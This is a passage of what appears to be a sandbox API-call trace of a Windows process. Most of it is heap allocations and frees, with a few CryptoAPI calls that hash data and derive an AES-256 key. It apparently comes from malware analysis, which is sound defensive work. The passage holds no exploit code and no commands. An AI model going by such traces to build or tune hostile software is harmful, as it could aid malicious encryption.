lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c36e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0082.973] CryptHashData (hHash=0x41ac780, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39b0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39b0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0082.974] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3620 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.975] PeekMessageW (in: lpMsg=0x144dde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dde4) returned 0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cc0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0620 [0082.975] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c37d0 [0082.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.976] PeekMessageW (in: lpMsg=0x144dde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dde4) returned 0 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35a8 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.976] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43c3770 [0082.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3770, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d06e8 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.978] CryptDeriveKey (in: hProv=0x41a4a58, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac000) returned 1 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3968 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b48 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b48 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b30 | out: hHeap=0x1780000) returned 1 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a40 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3890 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3890 | out: hHeap=0x1780000) returned 1 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38d8 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b78 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a58 [0082.979] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a58 | out: hHeap=0x1780000) returned 1 [0082.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b78 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.981] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0082.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.981] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.982] 